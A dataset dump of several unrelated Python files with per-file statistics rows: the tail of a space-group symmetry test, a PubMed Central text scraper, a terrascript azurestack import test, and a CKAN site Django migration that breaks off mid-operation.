'-y+1/2,-x+1/2,-z+1/2', 'y+1/2,-x+1/2,z+1/2', '-y+1/2,x+1/2,z+1/2', 'x+1/2,z+1/2,-y+1/2',
'-x+1/2,z+1/2,y+1/2', '-x+1/2,-z+1/2,-y+1/2', 'x+1/2,-z+1/2,y+1/2', 'z+1/2,y+1/2,-x+1/2',
'z+1/2,-y+1/2,x+1/2', '-z+1/2,y+1/2,x+1/2', '-z+1/2,-y+1/2,-x+1/2', '-x+1/2,-y+1/2,-z+1/2',
'x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2', '-z+1/2,-x+1/2,-y+1/2',
'-z+1/2,x+1/2,y+1/2', 'z+1/2,x+1/2,-y+1/2', 'z+1/2,-x+1/2,y+1/2', '-y+1/2,-z+1/2,-x+1/2',
'y+1/2,-z+1/2,x+1/2', '-y+1/2,z+1/2,x+1/2', 'y+1/2,z+1/2,-x+1/2', '-y+1/2,-x+1/2,z+1/2',
'y+1/2,x+1/2,z+1/2', '-y+1/2,x+1/2,-z+1/2', 'y+1/2,-x+1/2,-z+1/2', '-x+1/2,-z+1/2,y+1/2',
'x+1/2,-z+1/2,-y+1/2', 'x+1/2,z+1/2,y+1/2', '-x+1/2,z+1/2,-y+1/2', '-z+1/2,-y+1/2,x+1/2',
'-z+1/2,y+1/2,-x+1/2', 'z+1/2,-y+1/2,-x+1/2', 'z+1/2,y+1/2,x+1/2'],
230: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2',
'y+3/4,x+1/4,-z+1/4', '-y+3/4,-x+3/4,-z+3/4', 'y+1/4,-x+1/4,z+3/4', '-y+1/4,x+3/4,z+1/4',
'x+3/4,z+1/4,-y+1/4', '-x+1/4,z+3/4,y+1/4', '-x+3/4,-z+3/4,-y+3/4', 'x+1/4,-z+1/4,y+3/4',
'z+3/4,y+1/4,-x+1/4', 'z+1/4,-y+1/4,x+3/4', '-z+1/4,y+3/4,x+1/4', '-z+3/4,-y+3/4,-x+3/4', '-x,-y,-z',
'x+1/2,y,-z+1/2', 'x,-y+1/2,z+1/2', '-x+1/2,y+1/2,z', '-z,-x,-y', '-z+1/2,x+1/2,y', 'z+1/2,x,-y+1/2',
'z,-x+1/2,y+1/2', '-y,-z,-x', 'y,-z+1/2,x+1/2', '-y+1/2,z+1/2,x', 'y+1/2,z,-x+1/2',
'-y+1/4,-x+3/4,z+3/4', 'y+1/4,x+1/4,z+1/4', '-y+3/4,x+3/4,-z+1/4', 'y+3/4,-x+1/4,-z+3/4',
'-x+1/4,-z+3/4,y+3/4', 'x+3/4,-z+1/4,-y+3/4', 'x+1/4,z+1/4,y+1/4', '-x+3/4,z+3/4,-y+1/4',
'-z+1/4,-y+3/4,x+3/4', '-z+3/4,y+3/4,-x+1/4', 'z+3/4,-y+1/4,-x+3/4', 'z+1/4,y+1/4,x+1/4',
'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-x+1/2,y,-z', 'x,-y,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z,-x,-y+1/2',
'-z,-x+1/2,y', '-z+1/2,x,-y', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z,-x', 'y,-z,-x+1/2', '-y,-z+1/2,x',
'y+1/4,x+3/4,-z+3/4', '-y+1/4,-x+1/4,-z+1/4', 'y+3/4,-x+3/4,z+1/4', '-y+3/4,x+1/4,z+3/4',
'x+1/4,z+3/4,-y+3/4', '-x+3/4,z+1/4,y+3/4', '-x+1/4,-z+1/4,-y+1/4', 'x+3/4,-z+3/4,y+1/4',
'z+1/4,y+3/4,-x+3/4', 'z+3/4,-y+3/4,x+1/4', '-z+3/4,y+1/4,x+3/4', '-z+1/4,-y+1/4,-x+1/4',
'-x+1/2,-y+1/2,-z+1/2', 'x,y+1/2,-z', 'x+1/2,-y,z', '-x,y,z+1/2', '-z+1/2,-x+1/2,-y+1/2', '-z,x,y+1/2',
'z,x+1/2,-y', 'z+1/2,-x,y', '-y+1/2,-z+1/2,-x+1/2', 'y+1/2,-z,x', '-y,z,x+1/2', 'y,z+1/2,-x',
'-y+3/4,-x+1/4,z+1/4', 'y+3/4,x+3/4,z+3/4', '-y+1/4,x+1/4,-z+3/4', 'y+1/4,-x+3/4,-z+1/4',
'-x+3/4,-z+1/4,y+1/4', 'x+1/4,-z+3/4,-y+1/4', 'x+3/4,z+3/4,y+3/4', '-x+1/4,z+1/4,-y+3/4',
'-z+3/4,-y+1/4,x+1/4', '-z+1/4,y+1/4,-x+3/4', 'z+1/4,-y+3/4,-x+1/4', 'z+3/4,y+3/4,x+3/4']}
def test_generators():
for i in range(1, 231):
sg = symmetry.SpaceGroup(i)
string_generators = sg.string_generators
gens_str = symmetry.get_str_from_generator(sg.generators)
for op in gens_str:
assert (op in string_generators)
def test_operators():
for i in range(1, 231):
sg = symmetry.SpaceGroup(i)
symops = sg.symmetry_operations
symops_str = symmetry.get_str_from_generator(symops)
assert (len(symops_str) == len(poses[i]))
for op in poses[i]:
assert (op in symops_str)
if __name__ == "__main__":
pytest.main()
| 98 | 120 | 0.31944 | 26,654 | 85,750 | 1.02675 | 0.01013 | 0.327109 | 0.169584 | 0.141338 | 0.966639 | 0.966492 | 0.963679 | 0.963313 | 0.962583 | 0.96134 | 0 | 0.189842 | 0.186985 | 85,750 | 874 | 121 | 98.112128 | 0.202708 | 0.000735 | 0 | 0.165509 | 0 | 0 | 0.637402 | 0.007913 | 0 | 0 | 0 | 0 | 0.003472 | 1 | 0.002315 | false | 0 | 0.002315 | 0 | 0.00463 | 0 | 0 | 0 | 1 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
9e973901bc2c7503d62d3b183d01693c93100c31 | 27 | py | Python | project3_absolute/package3/module3.py | munich-ml/Python-imports | da41467507a7edf1d12c1a78d9aff812a6b553ed | [
"MIT"
] | null | null | null | project3_absolute/package3/module3.py | munich-ml/Python-imports | da41467507a7edf1d12c1a78d9aff812a6b553ed | [
"MIT"
] | null | null | null | project3_absolute/package3/module3.py | munich-ml/Python-imports | da41467507a7edf1d12c1a78d9aff812a6b553ed | [
"MIT"
] | null | null | null | def func3():
return 42 | 13.5 | 13 | 0.592593 | 4 | 27 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 0.296296 | 27 | 2 | 14 | 13.5 | 0.684211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
9eaf68c1a15945ec2e29748770691f2ea107d806 | 13,431 | py | Python | PubMedScraperFunctions.py | alexcwsmith/scNLP | 1691316f1dc13774fa05b0e6ea075941667fa6b0 | [
"MIT"
] | 1 | 2021-06-23T13:07:29.000Z | 2021-06-23T13:07:29.000Z | PubMedScraperFunctions.py | alexcwsmith/scNLP | 1691316f1dc13774fa05b0e6ea075941667fa6b0 | [
"MIT"
] | null | null | null | PubMedScraperFunctions.py | alexcwsmith/scNLP | 1691316f1dc13774fa05b0e6ea075941667fa6b0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 26 03:06:01 2020
@author: smith
"""
from Bio import Entrez
import pandas as pd
from bs4 import BeautifulSoup
from multiprocessing import Pool
import os
import glob
import nltk
import requests
import re
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.tokenize import sent_tokenize
import matplotlib.pyplot as plt
from config.PubMedScraperSettings import *
def info(title):
print(title, 'processID:', os.getpid())
def countPMCResults(term1):
page = requests.get('https://www.ncbi.nlm.nih.gov/pmc/?term=' + term1)
soup = BeautifulSoup(page.content, 'html.parser')
res = soup.find(id='maincontent')
res = soup.find(class_='result_count left').get_text()
numRes = int(res.rsplit()[-1])
return(numRes)
def findPMCIDs(searchTerm, term2=None, results=20, start=0, sort='relevance'):
search = Entrez.esearch(db='pmc', retmax=results, term=searchTerm, retstart=start, sort=sort)
record = Entrez.read(search)
recDf = pd.DataFrame.from_dict(record, orient='index').T
IDs = recDf.IdList.apply(pd.Series).T
IDs.columns=['PMCID']
# IDs.to_excel(os.path.join(paperDirectory, searchTerm + '_PMCIDS.xlsx'))
IDlist= IDs['PMCID'].tolist()
if len(IDlist) < 5:
print("WARNING: Low number of results detected for " + str(searchTerm.split(' ')[0]))
if term2 is not None:
search = Entrez.esearch(db='pmc', retmax=results, term=term2, retstart=start, sort=sort)
record = Entrez.read(search)
recDf = pd.DataFrame.from_dict(record, orient='index').T
IDs_term2 = recDf.IdList.apply(pd.Series).T
IDs_term2.columns=['PMCID']
IDlist2 = IDs_term2['PMCID'].tolist()
IDlist.extend(IDlist2)
return(IDlist)
def getFullText(PMCID):
if not os.path.exists(paperDirectory):
os.mkdir(paperDirectory)
os.mkdir(os.path.join(paperDirectory, 'null/'))
if not os.path.exists(abstractDirectory):
os.mkdir(abstractDirectory)
if not os.path.exists(titleDirectory):
os.mkdir(titleDirectory)
article = Entrez.efetch(db='pmc', id=PMCID, rettype='full', retmode='xml')
art = article.read()
soup = BeautifulSoup(art, 'html.parser')
title = soup.find('article-title').get_text()
journal = soup.find('journal-title')
if hasattr(journal, 'get_text'):
journal = soup.find('journal-title').get_text()
else:
journal = None
tables = soup.find_all('tr')
tab = list(tables)
for t in tab:
try:
t.decompose()
except AttributeError:
pass
try:
doi = soup.find_all('article-id')[2].get_text()
except IndexError:
doi = 'No DOI available'
info = 'TITLE: ' + str(title) + '\n' + 'JOURNAL: ' + str(journal) + '\n' + 'DOI: ' + str(doi)
with open(os.path.join(titleDirectory, str(PMCID) + '_info.txt'), 'w+') as f:
f.write(info)
f.close()
abstract = soup.find('abstract')
if hasattr(abstract, 'get_text') == True:
abstract_text = abstract.get_text()
with open(os.path.join(abstractDirectory, str(PMCID) + '_abstract.txt'), 'w+') as fa:
fa.write(abstract_text)
fa.close()
elif hasattr(abstract, 'get_text') == False:
with open(os.path.join(abstractDirectory, str(PMCID) + '_abstract_null.txt'), 'w+') as fa:
fa.write('No abstract available')
fa.close()
body = soup.find('body')
if hasattr(body, 'get_text') == True:
body_text = body.get_text()
body_text = re.sub(r'[\ \n]{2,}', '', body_text)
with open(os.path.join(paperDirectory, str(PMCID) + '_fulltext.txt'), 'w') as fb:
fb.write(body_text)
fb.close()
elif hasattr(body, 'get_text') == False:
with open(os.path.join(paperDirectory, 'null/' + str(PMCID) + '_fulltext_null.txt'), 'w+') as fb:
fb.write('No full text available')
fb.close()
def getFullTexts(IDs, results=50, start=0, end=None, sort='relevance'):
if not os.path.exists(paperDirectory):
os.mkdir(paperDirectory)
os.mkdir(os.path.join(paperDirectory, 'null/'))
if not os.path.exists(abstractDirectory):
os.mkdir(abstractDirectory)
if not os.path.exists(titleDirectory):
os.mkdir(titleDirectory)
for ID in IDs[start:end]:
dirs = os.listdir(paperDirectory)
if len(dirs)-2 < results:
getFullText(ID)
else:
pass
def getFullTextGene(PMCID, directory, gene=None):
paperDirectory = os.path.join(directory, 'papers/' + str(gene) + '/')
if not os.path.exists(paperDirectory):
os.mkdir(paperDirectory)
os.mkdir(os.path.join(paperDirectory, 'null/'))
if not os.path.exists(abstractDirectory):
os.mkdir(abstractDirectory)
os.mkdir(abstractDirectory, 'null/')
if not os.path.exists(titleDirectory):
os.mkdir(titleDirectory)
article = Entrez.efetch(db='pmc', id=PMCID, rettype='full', retmode='xml')
art = article.read()
soup = BeautifulSoup(art, 'html.parser')
if hasattr(soup.find('article-title'), 'get_text') ==True:
title = soup.find('article-title').get_text()
elif hasattr(soup.find('article-title'), 'get_text') == False:
title = 'No title available'
journal = soup.find('journal-title').get_text()
tables = soup.find_all('tr')
tab = list(tables)
for t in tab:
try:
t.decompose()
except AttributeError:
pass
try:
doi = soup.find_all('article-id')[2].get_text()
except IndexError:
doi = 'No DOI available'
info = 'TITLE: ' + str(title) + '\n' + 'JOURNAL: ' + str(journal) + '\n' + 'DOI: ' + str(doi)
with open(os.path.join(titleDirectory, str(PMCID) + '_info.txt'), 'w+') as f:
f.write(info)
f.close()
abstract = soup.find('abstract')
if hasattr(abstract, 'get_text') == True:
abstract_text = abstract.get_text()
with open(os.path.join(abstractDirectory, gene + '/' + str(PMCID) + '_abstract.txt'), 'w+') as fa:
fa.write(abstract_text)
fa.close()
elif hasattr(abstract, 'get_text') == False:
with open(os.path.join(abstractDirectory, gene + '/null/' + str(PMCID) + '_abstract_null.txt'), 'w+') as fa:
fa.write('No abstract available')
fa.close()
body = soup.find('body')
if hasattr(body, 'get_text') == True:
body_text = body.get_text()
body_text = re.sub(r'[\ \n]{2,}', '', body_text)
with open(os.path.join(paperDirectory, str(PMCID) + '_fulltext.txt'), 'w') as fb:
fb.write(body_text)
fb.close()
elif hasattr(body, 'get_text') == False:
with open(os.path.join(paperDirectory, 'null/' + str(PMCID) + '_fulltext_null.txt'), 'w+') as fb:
fb.write('No full text available')
fb.close()
def getFullTextsGene(IDs, directory, gene=None, results=50, start=0, end=None, sort='relevance'):
complete = False
paperDirectory = os.path.join(directory, 'papers/', str(gene) + '/')
if not os.path.exists(paperDirectory):
os.mkdir(paperDirectory)
os.mkdir(os.path.join(paperDirectory, 'null/'))
if not os.path.exists(abstractDirectory):
os.mkdir(abstractDirectory)
if not os.path.exists(titleDirectory):
os.mkdir(titleDirectory)
for ID in IDs[start:end]:
dirs = os.listdir(paperDirectory)
if len(dirs)-2 < results:
getFullTextGene(ID, directory=directory, gene=gene)
elif len(dirs)-2 == results:
pass
dirs = os.listdir(paperDirectory)
print("Retrieved " + str(len(dirs)-1) + " literature results for " + gene)
if len(dirs)-1 == 0:
print("WARNING: NO RESULTS RETRIEVED FOR " + gene)
print("WARNING: NO RESULTS RETRIEVED FOR " + gene)
def getAbstracts(PMCID):
if not os.path.exists(paperDirectory):
os.mkdir(paperDirectory)
os.mkdir(os.path.join(paperDirectory, 'null/'))
if not os.path.exists(abstractDirectory):
os.mkdir(abstractDirectory)
if not os.path.exists(titleDirectory):
os.mkdir(titleDirectory)
article = Entrez.efetch(db='pmc', id=PMCID, rettype='abstract', retmode='xml')
art = article.read()
soup = BeautifulSoup(art, 'html.parser')
title = soup.find('article-title').get_text()
journal = soup.find('journal-title')
if hasattr(journal, 'get_text'):
journal = soup.find('journal-title').get_text()
else:
journal = None
tables = soup.find_all('tr')
tab = list(tables)
for t in tab:
try:
t.decompose()
except AttributeError: pass
try:
doi = soup.find_all('article-id')[2].get_text()
except IndexError:
doi = 'No DOI available'
info = 'TITLE: ' + str(title) + '\n' + 'JOURNAL: ' + str(journal) + '\n' + 'DOI: ' + str(doi)
with open(os.path.join(titleDirectory, str(PMCID) + '_info.txt'), 'w+') as f:
f.write(info)
f.close()
abstract = soup.find('abstract')
if hasattr(abstract, 'get_text') == True:
abstract_text = abstract.get_text()
with open(os.path.join(abstractDirectory, str(PMCID) + '_abstract.txt'), 'w+') as fa:
fa.write(abstract_text)
fa.close()
elif hasattr(abstract, 'get_text') == False:
with open(os.path.join(abstractDirectory, str(PMCID) + '_abstract_null.txt'), 'w+') as fa:
fa.write('No abstract available')
fa.close()
def getAbstractGene(PMCID, directory, gene=None):
paperDirectory = os.path.join(directory, 'papers/' + str(gene) + '/')
if not os.path.exists(paperDirectory):
os.mkdir(paperDirectory)
os.mkdir(os.path.join(paperDirectory, 'null/'))
if not os.path.exists(abstractDirectory):
os.mkdir(abstractDirectory)
if not os.path.exists(titleDirectory):
os.mkdir(titleDirectory)
article = Entrez.efetch(db='pmc', id=PMCID, rettype='abstract', retmode='xml')
art = article.read()
soup = BeautifulSoup(art, 'html.parser')
if hasattr(soup.find('article-title'), 'get_text') ==True:
title = soup.find('article-title').get_text()
elif hasattr(soup.find('article-title'), 'get_text') == False:
title = 'No title available'
journal = soup.find('journal-title').get_text()
tables = soup.find_all('tr')
tab = list(tables)
for t in tab:
try:
t.decompose()
except AttributeError: pass
try:
doi = soup.find_all('article-id')[2].get_text()
except IndexError:
doi = 'No DOI available'
info = 'TITLE: ' + str(title) + '\n' + 'JOURNAL: ' + str(journal) + '\n' + 'DOI: ' + str(doi)
with open(os.path.join(titleDirectory, str(PMCID) + '_info.txt'), 'w+') as f:
f.write(info)
f.close()
abstract = soup.find('abstract')
if hasattr(abstract, 'get_text') == True:
abstract_text = abstract.get_text()
with open(os.path.join(abstractDirectory, str(gene) + '/' + str(PMCID) + '_abstract.txt'), 'w+') as fa:
fa.write(abstract_text)
fa.close()
elif hasattr(abstract, 'get_text') == False:
with open(os.path.join(abstractDirectory, str(gene) + '/' + str(PMCID) + '_abstract_null.txt'), 'w+') as fa:
fa.write('No abstract available')
fa.close()
def getAbstractsGene(IDs, directory, gene=None, results=500, start=0, end=None, sort='relevance'):
complete = False
abstractDirectory = os.path.join(directory, 'abstracts/', str(gene) + '/')
if not os.path.exists(paperDirectory):
os.mkdir(paperDirectory)
os.mkdir(os.path.join(paperDirectory, 'null/'))
if not os.path.exists(abstractDirectory):
os.mkdir(abstractDirectory)
if not os.path.exists(titleDirectory):
os.mkdir(titleDirectory)
for ID in IDs[start:end]:
dirs = os.listdir(abstractDirectory)
if len(dirs) < results:
getAbstractGene(ID, directory=directory, gene=gene)
elif len(dirs) == results:
pass
dirs = os.listdir(abstractDirectory)
print("Retrieved " + str(len(dirs)-1) + " literature results for " + gene)
if len(dirs)-1 == 0:
print("WARNING: NO RESULTS RETRIEVED FOR " + gene)
print("WARNING: NO RESULTS RETRIEVED FOR " + gene)
def combineTextFiles(directory, rettype='full', sizeLimit=1e6):
if rettype == 'full':
read_files = glob.glob(os.path.join(directory, '*fulltext.txt'))
elif rettype=='abstract':
read_files = glob.glob(os.path.join(directory, '*abstract.txt'))
skipList = []
with open(os.path.join(directory, 'CombinedFullTexts.txt'), 'w+') as outfile:
for file in read_files:
if os.stat(file).st_size < sizeLimit:
with open(file, 'r+') as infile:
outfile.write(infile.read())
else:
skipList.append(file)
with open(os.path.join(directory, 'skippedFullTexts.txt'), 'w+') as f:
f.write('\n'.join(skipList))
f.close()
with open(os.path.join(directory, 'CombinedFullTexts.txt'), 'r+') as r:
text = r.read()
r.close()
# return(text)
| 38.930435 | 116 | 0.613506 | 1,682 | 13,431 | 4.840666 | 0.127229 | 0.039794 | 0.040531 | 0.028371 | 0.812577 | 0.800909 | 0.795505 | 0.788136 | 0.733112 | 0.733112 | 0 | 0.005635 | 0.233713 | 13,431 | 344 | 117 | 39.043605 | 0.785464 | 0.013774 | 0 | 0.757377 | 0 | 0 | 0.130274 | 0.003176 | 0.013115 | 0 | 0 | 0 | 0 | 1 | 0.036066 | false | 0.022951 | 0.045902 | 0 | 0.081967 | 0.02623 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7b77bdadff5b3e43456a956fcb7c22043ca7548e | 4,219 | py | Python | tests/test_provider_hashicorp_azurestack.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | tests/test_provider_hashicorp_azurestack.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | tests/test_provider_hashicorp_azurestack.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # tests/test_provider_hashicorp_azurestack.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:13:15 UTC)
def test_provider_import():
import terrascript.provider.hashicorp.azurestack
def test_resource_import():
from terrascript.resource.hashicorp.azurestack import azurestack_availability_set
from terrascript.resource.hashicorp.azurestack import azurestack_dns_a_record
from terrascript.resource.hashicorp.azurestack import azurestack_dns_zone
from terrascript.resource.hashicorp.azurestack import azurestack_lb
from terrascript.resource.hashicorp.azurestack import (
azurestack_lb_backend_address_pool,
)
from terrascript.resource.hashicorp.azurestack import azurestack_lb_nat_pool
from terrascript.resource.hashicorp.azurestack import azurestack_lb_nat_rule
from terrascript.resource.hashicorp.azurestack import azurestack_lb_probe
from terrascript.resource.hashicorp.azurestack import azurestack_lb_rule
from terrascript.resource.hashicorp.azurestack import (
azurestack_local_network_gateway,
)
from terrascript.resource.hashicorp.azurestack import azurestack_managed_disk
from terrascript.resource.hashicorp.azurestack import azurestack_network_interface
from terrascript.resource.hashicorp.azurestack import (
azurestack_network_security_group,
)
from terrascript.resource.hashicorp.azurestack import (
azurestack_network_security_rule,
)
from terrascript.resource.hashicorp.azurestack import azurestack_public_ip
from terrascript.resource.hashicorp.azurestack import azurestack_resource_group
from terrascript.resource.hashicorp.azurestack import azurestack_route
from terrascript.resource.hashicorp.azurestack import azurestack_route_table
from terrascript.resource.hashicorp.azurestack import azurestack_storage_account
from terrascript.resource.hashicorp.azurestack import azurestack_storage_blob
from terrascript.resource.hashicorp.azurestack import azurestack_storage_container
from terrascript.resource.hashicorp.azurestack import azurestack_subnet
from terrascript.resource.hashicorp.azurestack import azurestack_template_deployment
from terrascript.resource.hashicorp.azurestack import azurestack_virtual_machine
from terrascript.resource.hashicorp.azurestack import (
azurestack_virtual_machine_extension,
)
from terrascript.resource.hashicorp.azurestack import (
azurestack_virtual_machine_scale_set,
)
from terrascript.resource.hashicorp.azurestack import azurestack_virtual_network
from terrascript.resource.hashicorp.azurestack import (
azurestack_virtual_network_gateway,
)
from terrascript.resource.hashicorp.azurestack import (
azurestack_virtual_network_gateway_connection,
)
def test_datasource_import():
from terrascript.data.hashicorp.azurestack import azurestack_client_config
from terrascript.data.hashicorp.azurestack import azurestack_network_interface
from terrascript.data.hashicorp.azurestack import azurestack_network_security_group
from terrascript.data.hashicorp.azurestack import azurestack_platform_image
from terrascript.data.hashicorp.azurestack import azurestack_public_ip
from terrascript.data.hashicorp.azurestack import azurestack_resource_group
from terrascript.data.hashicorp.azurestack import azurestack_route_table
from terrascript.data.hashicorp.azurestack import azurestack_storage_account
from terrascript.data.hashicorp.azurestack import azurestack_subnet
from terrascript.data.hashicorp.azurestack import azurestack_virtual_network
from terrascript.data.hashicorp.azurestack import azurestack_virtual_network_gateway
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.hashicorp.azurestack
#
# t = terrascript.provider.hashicorp.azurestack.azurestack()
# s = str(t)
#
# assert 'https://github.com/hashicorp/terraform-provider-azurestack' in s
# assert '0.10.0' in s
| 34.867769 | 88 | 0.813226 | 463 | 4,219 | 7.185745 | 0.207343 | 0.251277 | 0.300571 | 0.4208 | 0.832281 | 0.805831 | 0.805831 | 0.709348 | 0.303276 | 0.087767 | 0 | 0.004391 | 0.136288 | 4,219 | 120 | 89 | 35.158333 | 0.908617 | 0.123015 | 0 | 0.133333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008333 | 0 | 1 | 0.05 | true | 0 | 0.733333 | 0 | 0.783333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 11 |
cdc0b01dda5906444aca85708d437f40024752ad | 6,517 | py | Python | streams/ckan_pages/migrations/0003_auto_20200928_0605.py | Engerrs/ckan.org | a5a9b63b0ca16cb5aa4f709f7a264b8f6c265158 | [
"BSD-3-Clause"
] | 1 | 2022-03-18T03:20:00.000Z | 2022-03-18T03:20:00.000Z | streams/ckan_pages/migrations/0003_auto_20200928_0605.py | Engerrs/ckan.org | a5a9b63b0ca16cb5aa4f709f7a264b8f6c265158 | [
"BSD-3-Clause"
] | 26 | 2021-07-07T08:42:42.000Z | 2022-03-29T14:34:59.000Z | streams/ckan_pages/migrations/0003_auto_20200928_0605.py | Engerrs/ckan.org | a5a9b63b0ca16cb5aa4f709f7a264b8f6c265158 | [
"BSD-3-Clause"
] | 3 | 2021-07-07T22:11:03.000Z | 2021-09-15T18:19:10.000Z | # Generated by Django 3.1.1 on 2020-09-28 06:05
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
class Migration(migrations.Migration):
dependencies = [
('ckan_pages', '0002_auto_20200928_0605'),
('wagtailimages', '0022_uploadedimage'),
('streams', '0002_auto_20200928_0605'),
]
operations = [
migrations.AddField(
model_name='workinggroups',
name='working_group',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.workinggroup'),
),
migrations.AddField(
model_name='stewards',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='stewards', to='ckan_pages.communitypage'),
),
migrations.AddField(
model_name='stewards',
name='steward',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.steward'),
),
migrations.AddField(
model_name='softwareengineers',
name='developer',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.softwareengineer'),
),
migrations.AddField(
model_name='softwareengineers',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='developers', to='ckan_pages.communitypage'),
),
migrations.AddField(
model_name='showcasesection3',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='showcase_section_3', to='ckan_pages.showcasepage'),
),
migrations.AddField(
model_name='showcasesection3',
name='showcase',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.poweredcard'),
),
migrations.AddField(
model_name='showcasesection2',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='showcase_section_2', to='ckan_pages.showcasepage'),
),
migrations.AddField(
model_name='showcasesection2',
name='showcase',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.poweredcard'),
),
migrations.AddField(
model_name='showcasesection1',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='showcase_section_1', to='ckan_pages.showcasepage'),
),
migrations.AddField(
model_name='showcasesection1',
name='showcase',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.poweredcard'),
),
migrations.AddField(
model_name='generalfeatures',
name='feature',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.generalfeature'),
),
migrations.AddField(
model_name='generalfeatures',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='general_features', to='ckan_pages.featurespage'),
),
migrations.AddField(
model_name='feedbacksection2',
name='feedback',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.feedback'),
),
migrations.AddField(
model_name='feedbacksection2',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='feedback_section_2', to='ckan_pages.showcasepage'),
),
migrations.AddField(
model_name='feedbacksection1',
name='feedback',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.feedback'),
),
migrations.AddField(
model_name='feedbacksection1',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='feedback_section_1', to='ckan_pages.showcasepage'),
),
migrations.AddField(
model_name='features',
name='feature',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.feature'),
),
migrations.AddField(
model_name='features',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='features', to='ckan_pages.featurespage'),
),
migrations.AddField(
model_name='extensions',
name='extension',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.extension'),
),
migrations.AddField(
model_name='extensions',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='extensions', to='ckan_pages.featurespage'),
),
migrations.AddField(
model_name='communitypage',
name='contributors_image',
field=models.ForeignKey(help_text="Contributors' photos", null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.image'),
),
migrations.AddField(
model_name='communitypage',
name='open_knowledge_foundation_image',
field=models.ForeignKey(help_text='Open Knowledge Foundation block image', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.image'),
),
migrations.AddField(
model_name='ckanforfeatures',
name='ckan_for_card',
